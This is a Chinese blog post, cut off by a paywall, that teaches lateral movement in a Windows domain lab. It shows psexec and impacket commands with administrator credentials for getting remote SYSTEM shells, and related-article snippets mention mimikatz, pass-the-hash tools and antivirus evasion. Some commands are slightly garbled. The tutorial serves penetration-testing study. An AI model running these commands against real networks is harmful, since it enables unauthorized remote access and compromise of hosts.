内网渗透-横向移动外部工具的使用

已于 2023-01-20 00:28:27 修改
阅读量2.2k 收藏 6
点赞数 1
分类专栏: 内网渗透 文章标签: 安全性测试 web安全 安全
于 2022-10-01 01:24:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/127074136
版权
本文详细介绍了内网渗透中横向移动的技术,包括psexec、Smbexec、Wmiexec、msf模块和cs模块的使用,重点讨论了如何利用这些工具在域环境中进行权限提升和横向移动,以达到控制其他主机的目的。
摘要由CSDN通过智能技术生成

横向移动外部工具的使用

前言

文章目录

psexec

首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话
在已获得的shell中输入
net use \192.168.52.141 /user:administrator “密码”

(1)psexec
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

psexec使用
建立IPC连接,无需输入密码
net use \192.168.52.141 /user:administrator “密码”

反弹cmd
psexec.exe \192.168.52.141 -s cmd.exe -acceptcula

执行命令
psexec.exe \192.168.52.141 whoami -acceptcula

psexec.py
与官方psexec.exe相比会自动删除服务,增加隐蔽性
psexec.exe god/Administrator:hongrisec@2019@192.168.52.141 whoami Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

psexec.py<

了解本专栏 订阅专栏 解锁全文 超级会员免费看
炫彩@之星
关注
专栏目录
订阅专栏
内网渗透-内置工具横向移动
lza20001103的博客
10-01 1281
内置工具横向移动 文章目录内置工具横向移动前言IPCSchtasksIPC+ATIPC+SC后记 前言 前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动工具使用。 IPC IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view 当前的域有哪些主机 net use 查看当前是否有
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 527
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
smbexec: 简单、高效的远程执行命令工具
gitblog_00002的博客
03-18 860
smbexec: 简单、高效的远程执行命令工具 smbexec 项目地址: https://gitcode.com/gh_mirrors/smbe/smbexec 是一个轻量级的 Python 脚本,用于通...
windows外部工具横向移动
weixin_43873557的博客
02-10 537
01. Psexec PsExec是一种轻巧的telnet替代品,可让您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。 下载地址:https://docs.microsoft.com/zhcn/sysinternals/downloads/psexec 原理: 建立IPC连接,使用Psexec无需输入密码 第一次运行会弹框, 加 -accepteula 参数可绕过 -c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除) -d 不
使用Psexec进行横向移动
无问社区的博客
08-30 319
进入系统后的后渗透横向移动方法分享
一款内网横向渗透辅助工具
weixin_46211944的博客
08-04 696
配合使用工具(如Mimikatz)扫描本地密码,并将密码写入source/pass_list.txt 以下工具(1)简称(1)(1)检测域。检测到域后,工具(2)自动使用 “net user /domain”等语法检测判断域用户(3)探索其他存活域主机:自动将网段IP信息写入source/ip_list.txt)语法:for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I |findstr "TTL="(4)将本机wifi密码并输出至屏幕。...
内网横向渗透神器-CS
qq_39756628的博客
06-22 2553
简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrike4.0/tree/master/cobaltstrike4.0 一、CS服务器启动: 以本地kali(192.168.3.134)为服务器,进入相应目录,直接运行: ./teamserver 192.168.3. 134 ztf 二、本地客户端连接: 直接启动start.bat,需要有java的环境,没
安全(3)相关工具在内网横向移动中的运用
weixin_51339377的博客
03-27 798
1.mimikatz在内网中的使用 域环境下用户的信息储存在ntds.dit中 加密后为散列值 windows密码一般由两部分 LM Hash + NTLM Hash user1:RID:LM-HASH:NT-HASH 1.在kali中输入mimikatz可以获取该工具的地址 /usr/share/windows-resources/mimikatz 2.只需要把mimikatz文件夹下的x64复制到目标计算机上即可 3.接下来在msf中的system权限下对该计算机..
windows内置工具横向移动
weixin_43873557的博客
02-10 529
01. IPC+Schtasks IPC$ (Internet Process Connection) 是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 利用条件 开放了139、445端口; 目标开启IPC$文件共享服务 需要目标机器的管理员账号和密码 连接 net use \10.10.10.201\ipc$ /user:administrator “1qaz@
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
这些方法揭示了内网渗透的常见步骤和工具,了解这些技术对于加强网络安全至关重要。防御者应定期进行安全审计和更新防御策略,以对抗潜在的威胁。通过红蓝对抗,企业可以发现自身弱点,及时修复,提升整体安全态势。
细说内网横向工具WMIHACK
Lsec的博客
07-11 2046
1.前言 此工具为香山大佬开源的一款内网横向渗透工具,阅读源码后被大佬的思路及所使用的技术细节所震撼,并始终认为对于wmi没有一定了解是无法写出如此精妙的代码,获益良多。本文不对工具使用做太多讲解,关于使用网上的文章已经太多了,只探讨背后的技术细节。 项目地址:https://github.com/360-Linton-Lab/WMIHACKER 1 基础知识 2.1 WMI简介 WMI 的全称是 Windows Management Instrumentation,即 Windows 管理
局域网渗透的一些小工具(支持win7)
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
.NET 一款支持运行VBS的横向移动工具
ahhacker86的专栏
06-23 595
Sharp4Move是一款用于内网横向移动的高级工具。原理上利用多种基于Windows的协议和机制,包括Windows Management Instrumentation(WMI)、Service Control Manager(SCM)和Distributed Component Object Model(DCOM),在远程系统上执行命令。另外该工具包含绕过Windows Anti-Malware Scan Interface(AMSI)的选项,提高了规避安全软件检测的效果。
免杀横向移动工具WMIHACKER
XXR_Beta的博客
07-04 2023
免杀横向移动工具WMIHACKER交互式Shell命令执行文件上传文件下载 免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出WMIHACKER免杀横向移动测试工具。 其通过135端口进行命令执行,执行的结果读取以及无需445端口进行文件传输。此工具利用的前提条件是: 获取到目标主机的账户密码 可能会有人问既然我都拿到主机的账号密码,我远程直接登录不香吗?那远程桌面连接是不是需要开
横向移动工具-impacket-gui(一)
siu~
09-04 350
一款内网横向移动图形化工具
.NET 一款支持NTLM实现横向移动工具
最新发布
ahhacker86的专栏
09-09 302
Sharp4SMBExec 是一个强大的横向移动工具,允许用户在目标计算机上通过 SMB 协议执行命令,而无需知道目标用户的明文密码。只需要提供用户的 NTLM 哈希即可。这对于渗透测试和红队行动非常有用,因为在获取到用户的 NTLM 哈希后,可以利用该工具在目标机器上执行任意命令。
内网渗透-内网横向移动的九种方式
lza20001103的博客
04-14 2212
内网横向移动的九种方式
嘎嘎好用的内网横向移动工具
qq_69775412的博客
08-08 372
日常项目中,同事吐槽在进行内网横向的时候老是输命令输命令,贼烦。问问能不能整个图形化页面,然后就有了本项目。
内网渗透测试:内网横向移动基础总结
zhangge3663的博客
10-27 4795
作者:WHOAMI,转载于freebuf。 横向移动内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来 讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近
fscan内网渗透工具使用教程及特点介绍
工具广泛用于网络安全领域,特别适合在进行内网渗透测试使用。 1. 安装与环境配置 - 在Windows环境下安装fscan之前,首先需要下载并安装Go语言环境。Go语言环境可以从官方网站(***)获取对应Windows版本的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值